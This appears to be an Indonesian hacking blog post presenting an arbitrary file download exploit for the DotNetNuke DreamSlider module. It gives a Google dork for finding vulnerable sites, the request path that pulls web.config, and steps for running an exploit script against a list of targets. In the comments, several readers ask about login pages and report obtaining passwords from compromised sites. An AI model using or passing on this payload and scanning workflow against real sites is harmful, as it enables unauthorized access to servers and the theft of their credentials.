Saturday, 30 December 2017

dotNetNuke DreamSlider Arbitrary File Download



Exploit Title: dotNetNuke DreamSlider Arbitrary File Download
Google Dork: inurl://DesktopModules/DreamSlider/
Exploit: /DesktopModules/DreamSlider/DownloadProvider.aspx?File=~/web.config


------------------------------------------------------------------------
1. Masukan list target ke dalam file.txt

http://target.com/
http://target2.com/

2. Jalankan php exploit.php target.txt


9 comments:

Wiby said...

Bang Request google dorker dong yang kayak bing dorker itu sama yang grab all patch heheh

Ronaldi said...

loginnya dimana ya gan?

Yildiz Kiral said...

login.aspx coba aja

Anonymous said...

google dorker dah susah, kena captcha

Anonymous said...

coba di exploit ulng/jalanin toolsnya ulang

Tryo Asnafi said...
This comment has been removed by the author.
Tryo Asnafi said...
This comment has been removed by the author.
Tryo Asnafi said...

udah dapat password nya cuman kenapa ga bisa login kang ... itu masalah nya apa ?

GagakPutih said...
This comment has been removed by the author.

Post a Comment